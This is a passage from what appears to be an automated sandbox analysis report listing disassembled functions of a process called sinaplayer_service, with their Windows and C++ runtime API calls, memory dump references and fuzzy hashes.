                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$_errno_getptd_isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3831352077-0
                                                                                                                                                                                                    • Opcode ID: 0fe2a3b1a1f6675ac5af603ed565c6fc22657a4159eea39b855d6c6627feef8c
                                                                                                                                                                                                    • Instruction ID: fc7d8961511ea6a9614abba6f666f00006665c843c9846c98e82fa1f2b7dfc66
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fe2a3b1a1f6675ac5af603ed565c6fc22657a4159eea39b855d6c6627feef8c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2631C034606346EFDB218E7ACC48BAB7BB5EF45318F114519E424CBDA0EB71D891CBA0
                                                                                                                                                                                                    Function 00392030 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00391089,000000FF,00000000,00000000,00000000,00000000,00391DBA,?,?), ref: 00392097
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    • Opcode ID: 39c0618e609784930f7e892025905ca4523b264c36945bdd60b5d052f9b24730
                                                                                                                                                                                                    • Instruction ID: 462469e259bc06b3739658111644297b505f368883ca4a9faef82eac0b5f038d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39c0618e609784930f7e892025905ca4523b264c36945bdd60b5d052f9b24730
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4831D6B1B04209ABDF21EF68DC42B6EB7B8EB55720F10016AF905AB3C1D7B56948C791
                                                                                                                                                                                                    Function 0038A3A0 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000), ref: 0038A407
                                                                                                                                                                                                    • ??0?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120 ref: 0038A431
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 0038A44B
                                                                                                                                                                                                    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000002,00000000,?,?,00000000), ref: 0038A48D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@_$W@std@@@std@@$??0?$basic_ostream@_??0?$basic_streambuf@_?setstate@?$basic_ios@_Init@?$basic_streambuf@_V?$basic_streambuf@_W@std@@@1@_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3606007235-0
                                                                                                                                                                                                    • Opcode ID: df4a8d5fe50e326ac69afc7b0865e4bb5ad552d557068ac5badecf684aecec80
                                                                                                                                                                                                    • Instruction ID: bcff585dd62de1ca3a47652f556385a83e1cf645f2c60875f339fc47dad0f6e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: df4a8d5fe50e326ac69afc7b0865e4bb5ad552d557068ac5badecf684aecec80
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1031ACB5604349EFDB12CF28D949B9ABBF8FF08304F00415AE805D7390D7BAAA04CB91
                                                                                                                                                                                                    Function 6C582FD4 Relevance: 6.1, APIs: 4, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000004,00000000,?,00ED4598,?,6C583036,00ED4598,00000000,?,00ED4C78), ref: 6C582FF8
                                                                                                                                                                                                    • _wcsdup.MSVCR120(00000000,00000000,?,00ED4598,?,6C583036,00ED4598,00000000,?,00ED4C78), ref: 6C583014
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _calloc_crt_wcsdup
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1800982338-0
                                                                                                                                                                                                    • Opcode ID: b0fe7b725b29a83c4a14550cb427ca2425c1774722ca57250ecbad769a9b9887
                                                                                                                                                                                                    • Instruction ID: d1ef57521d6e34d3284c5a19809e5aa24129aaa8caa9450183e127d91827b0b0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0fe7b725b29a83c4a14550cb427ca2425c1774722ca57250ecbad769a9b9887
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4111E172B061259BD7108A6EEC40A67B7F8DB81769B24023EEC59D7A40DB71DC41C790
                                                                                                                                                                                                    Function 003808C0 Relevance: 6.1, APIs: 4, Instructions: 75timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0Info@File@base@@QAE@XZ.BASE(8285FFAB,00380B82), ref: 003808FA
                                                                                                                                                                                                    • ?GetFileInfo@base@@YA_NABVFilePath@1@PAUInfo@File@1@@Z.BASE(0038069E,?), ref: 0038090F
                                                                                                                                                                                                    • ?Explode@Time@base@@ABEX_NPAUExploded@12@@Z.BASE(00000001,?), ref: 00380931
                                                                                                                                                                                                    • ??1Info@File@base@@QAE@XZ.BASE ref: 0038099E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Info@$FileFile@base@@$Explode@Exploded@12@@File@1@@Info@base@@Path@1@Time@base@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3989346381-0
                                                                                                                                                                                                    • Opcode ID: 10f0f077163d8955b554757bd46581ca494c319a7904b7c5002ce2029b3ebd51
                                                                                                                                                                                                    • Instruction ID: 5c5cf0d1f1282ed79d51297da9e62de6fa5ee7428e9977ff99c1666f33e3d743
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10f0f077163d8955b554757bd46581ca494c319a7904b7c5002ce2029b3ebd51
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8631F2B1D006999FDB11CFA8D981AEDBBF4FF49314F20825AE855A7380EB346A44CF40
                                                                                                                                                                                                    Function 00386920 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB), ref: 00386953
                                                                                                                                                                                                    • ??0DictionaryValue@base@@QAE@XZ.BASE ref: 0038696D
                                                                                                                                                                                                    • ?SetString@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0@Z.BASE(00000000,?,?,?,?,?,?,?,?,?,?,?,0039AEA3,000000FF), ref: 003869C5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,?,?,?,?,?,?,?,?,0039AEA3,000000FF), ref: 003869D4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DictionaryValue@base@@$??2@??3@D@2@@std@@0@D@std@@String@U?$char_traits@V?$allocator@V?$basic_string@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1815709613-0
                                                                                                                                                                                                    • Opcode ID: d978650b179957ea9d40b5a292881bbd7358e63a2df1276b55e871d90bbb9761
                                                                                                                                                                                                    • Instruction ID: 831f450352ff56cf2febba07f2182df7d48671946cc0cc05b595ae158c232622
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d978650b179957ea9d40b5a292881bbd7358e63a2df1276b55e871d90bbb9761
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A12107B2904248DFDF16DF98C8457FEBBB8EB49720F104269E816AB7C1D7751A44CB90
                                                                                                                                                                                                    Function 00374A20 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?), ref: 00374A55
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,?,?), ref: 00374A68
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00374AB0
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120 ref: 00374AD8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@?gptr@?$basic_streambuf@D@std@@@std@@U?$char_traits@Xbad_alloc@std@@memcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1600060970-0
                                                                                                                                                                                                    • Opcode ID: 888f3c4c1e3b05cadeceaf2dd0c5dbf49e587e43f4626dc204ddc6bcb4c87e3b
                                                                                                                                                                                                    • Instruction ID: feb6a06068aca5b8b306cf88adb2946c319fb572859c9bb2401070e6b11ca6b3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 888f3c4c1e3b05cadeceaf2dd0c5dbf49e587e43f4626dc204ddc6bcb4c87e3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621F5B5200B008FC7A68F19D480A56B7E9FF99314B46891EE99A8BB60D774F811CF64
                                                                                                                                                                                                    Function 003864E0 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?is_valid@WeakReference@internal@base@@QBE_NXZ.BASE(8285FFAB,00000000,?), ref: 00386521
                                                                                                                                                                                                    • ?is_valid@WeakReference@internal@base@@QBE_NXZ.BASE ref: 00386536
                                                                                                                                                                                                    • ?is_valid@WeakReference@internal@base@@QBE_NXZ.BASE ref: 00386551
                                                                                                                                                                                                    • ??1WeakPtrBase@internal@base@@QAE@XZ.BASE(00000000,00000000,?), ref: 00386594
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Weak$?is_valid@Reference@internal@base@@$Base@internal@base@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3336534564-0
                                                                                                                                                                                                    • Opcode ID: 9217276d9e3295853803eea301c0d0b4fa76c3aa82c182ab62c6ede500a5852f
                                                                                                                                                                                                    • Instruction ID: 0e13e4f5315c20287ec0a5a7f724872b7e88a29ce7c85f2cf34c3f0e9f50aee8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9217276d9e3295853803eea301c0d0b4fa76c3aa82c182ab62c6ede500a5852f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4221A4B190020DDBCF11EF95C945BAEFBB8FF05314F1441AAD819A7695C735AA04CBA0
                                                                                                                                                                                                    Function 0038F3D0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,00000000,?,0038F4B5,0038F0F4,?,00000000), ref: 0038F3E1
                                                                                                                                                                                                      • Part of subcall function 0038EAA0: GetCurrentProcess.KERNEL32 ref: 0038EAAA
                                                                                                                                                                                                      • Part of subcall function 0038EAA0: DuplicateHandle.KERNEL32(00000000,?,?,?,00000002,00000000,00000000), ref: 0038EAC9
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(?,0FEB0000,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,0038F4B5,0038F0F4,?,00000000), ref: 0038F41E
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(?,9F89F633,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,0038F4B5,0038F0F4,?,00000000), ref: 0038F43C
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(?,000000B8,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,0038F4B5,0038F0F4,?,00000000), ref: 0038F45A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DuplicateHandle$CurrentProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 322452111-0
                                                                                                                                                                                                    • Opcode ID: ce147aae9d0c3c5bf017eff3586db8ffff62baacec2fcf935687b6426e61b26e
                                                                                                                                                                                                    • Instruction ID: 3e59df2a3bafa2ba5d114b7c7675d6d1a665400e86735a4ebe348a8007f58822
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce147aae9d0c3c5bf017eff3586db8ffff62baacec2fcf935687b6426e61b26e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8112E713403157AEB205F16DC86F56BBACBB49B10F214156BA08AB6C0C7B2F8108BA8
                                                                                                                                                                                                    Function 0038F160 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetOverlappedResult.KERNEL32(?,?,?,00000000,8285FFAB), ref: 0038F19C
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 0038F1B5
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 0038F1EF
                                                                                                                                                                                                    • SetEvent.KERNEL32 ref: 0038F202
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterEventLeaveOverlappedResult
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2973586297-0
                                                                                                                                                                                                    • Opcode ID: 8ebb24afe00695799b7053f3c17c5018b32e782d73a8ad78c7cb5efac8d3d596
                                                                                                                                                                                                    • Instruction ID: df3c2ba691152c754ef5fda5899a5b2d6d9cbcd902a9ee3e5ee38f6b4e2f8731
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ebb24afe00695799b7053f3c17c5018b32e782d73a8ad78c7cb5efac8d3d596
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E821AC71A00B04DFDB22DF64DC49B9AB7F9FF04304F10466AE812D36A0DB76A944CB90
                                                                                                                                                                                                    Function 00386BC0 Relevance: 6.1, APIs: 4, Instructions: 63threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(8285FFAB,?,?,?,?,0039AF1E,000000FF), ref: 00386C03
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(8285FFAB,?,?,?,?,0039AF1E,000000FF), ref: 00386C25
                                                                                                                                                                                                    • ?Release@RefCountedThreadSafeBase@subtle@base@@IBE_NXZ.BASE(?,?,?,?,0039AF1E,000000FF), ref: 00386C3B
                                                                                                                                                                                                    • ?Destruct@TaskRunnerTraits@base@@SAXPBVTaskRunner@2@@Z.BASE(00000000,?,?,?,?,0039AF1E,000000FF), ref: 00386C51
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@subtle@base@@CountedRelease@SafeTaskThread$Base@internal@base@@CallbackDestruct@RunnerRunner@2@@Traits@base@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 15455870-0
                                                                                                                                                                                                    • Opcode ID: e1bf6edc2db2d30caef17108e7f36cf1240dda32c8cdeb93cfe2fe0215794389
                                                                                                                                                                                                    • Instruction ID: 8acd4ea8dd80f83f6141a74096f950e44b67ae828377b15e9966c080dd1adbe0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1bf6edc2db2d30caef17108e7f36cf1240dda32c8cdeb93cfe2fe0215794389
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC112672601740DFDB22DF09D90676AB7B9FF85714F1A029EE85A83780EB71A900C740
                                                                                                                                                                                                    Function 00375EC0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedCompareExchange.KERNEL32(003AC118,00000001,00000000), ref: 00375EFB
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000134,?,?,?,003993DB,000000FF), ref: 00375F0A
                                                                                                                                                                                                    • ?RegisterCallback@AtExitManager@base@@SAXP6AXPAX@Z0@Z.BASE(00375EA0,00000000), ref: 00375F45
                                                                                                                                                                                                    • ?WaitForInstance@internal@base@@YAHPAH@Z.BASE(003AC118,?,?,?,003993DB,000000FF), ref: 00375F65
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Callback@CompareExchangeExitInstance@internal@base@@InterlockedManager@base@@RegisterWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3826326119-0
                                                                                                                                                                                                    • Opcode ID: 78e9f0304624f7380d949ed7c659927707253f9641701284111406141f893af4
                                                                                                                                                                                                    • Instruction ID: e19db8995893c807ae2ddda6299e0517b169d5065e2ea2e9170e4ef050f17414
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78e9f0304624f7380d949ed7c659927707253f9641701284111406141f893af4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA112E71B14614DBDB36CF589C42B99B7ECD704B50F10426AF815D77C0E7B959008791
                                                                                                                                                                                                    Function 00390CB0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 00390CF2
                                                                                                                                                                                                    • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,8285FFAB), ref: 00390D10
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00390D3A
                                                                                                                                                                                                    • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP120 ref: 00390D54
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@D@std@@@1@_Init@?$basic_streambuf@_U?$char_traits@_V?$basic_streambuf@W@std@@@std@@
                                                                                                                                                                                                    • String ID:
